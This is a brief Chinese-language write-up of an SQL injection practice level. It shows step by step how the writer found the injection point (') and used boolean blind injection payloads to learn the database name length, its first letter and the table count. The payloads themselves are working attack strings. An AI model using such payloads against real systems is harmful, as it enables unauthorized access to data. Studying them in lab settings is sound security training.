欢迎界面提示我们一共由130次机会 而且还是以id作为注入点 每次重置都会随机分配表名、字段名、表格数据
首先判断注入类型 输入id=1 and 1=2 回显如下 说明不属于数字型
接着输入1' 回显如下 没有回显 说明注入点带有单引号
佐证一下吧 输入1'--+ 回显如下 说明不是纯粹的单引号
试试看id=1')--+ 回显如下 那么注入点就是单引号外加一个括号
接着试试看能不能进行报错注入 输入id=1') and updatexml(1,concat(0x7e,database(),0x7e),1)--+
不能 没有回显
那么我们就是用以下联合注入吧 输入如下
id=0') union select 1,2,3--+
也不行 那么只能使用盲注了 输入如下
id=1') and length(database())=10--+
存在正确回显 所以数据库的长度为10 回显如下
接着获取以下数据库的首字母 输入如下
id=1') and ascii(substr((database()),1,1))=99--+
存在正确回显 所以表示数据库的首字母为c 回显如下
接着获取表格的个数 输入如下
id=1') and (select count(*) from information_schema.tables where table_schema=database())=1--+
正确回显了 说明表格的数量为1
接下来的步骤可以尝试用脚本去完成 因为表格名称是随机分配的 所以不好提前知道
那么这一关就先告一段落了 嗨嗨 !!